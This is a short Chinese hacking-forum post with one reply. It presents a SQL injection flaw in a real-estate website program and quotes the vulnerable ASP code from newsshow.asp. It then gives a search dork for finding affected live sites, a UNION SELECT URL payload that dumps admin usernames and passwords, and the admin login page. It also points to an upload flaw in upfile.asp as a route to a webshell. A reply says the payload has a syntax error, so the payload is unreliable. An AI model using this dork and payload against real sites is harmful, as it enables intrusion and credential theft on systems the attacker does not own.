房产程序 v1.0注射漏洞分析
程序代码[code]核心提示:漏洞文件:newsshow.asp漏洞代码:% set rs=server.createobject('adodb.recordset')sql='update news set hit=hit+1 where ID='request('id')rs.open sql,conn,1,3%% set ...[/code]漏洞文件:newsshow.asp漏洞代码:
程序代码[code]<%
set rs=server.createobject("adodb.recordset")
sql="update news set hit=hit+1 where ID="&request("id")
rs.open sql,conn,1,3
%>
<%
set rs=server.CreateObject("adodb.recordset")
sql="select * from news where ID="&request("id")
rs.open sql,conn
%>[/code]只分析了这一个,
任意上传漏洞:upfile.asp
有兴趣的可以分析下利用上传拿WEBSHELL
搜索关键词:inurl:baodianlist.asp+信息中心
然后输入[code]http://127.0.0.1/newsshow.asp?id=50%20union%20select%201,username,password,4,5,6%20from%20admin[/code]爆出管理帐号密码
后台登陆地址:admin.asp
剩下的自己搞吧! laodao woai ni [b] [url=http://www.3ast.com.cn/redirect.php?goto=findpost&pid=52291&ptid=9810]1#[/url] [i]柔肠寸断[/i] [/b]
高人 支持 顶 很不幸的告诉你 ···最后那个联合查询语法错误·· 后台貌似很容易进 不过也太简陋了 ...上传还有限制 对于我这个菜鸟无法拿shell
页:
[1]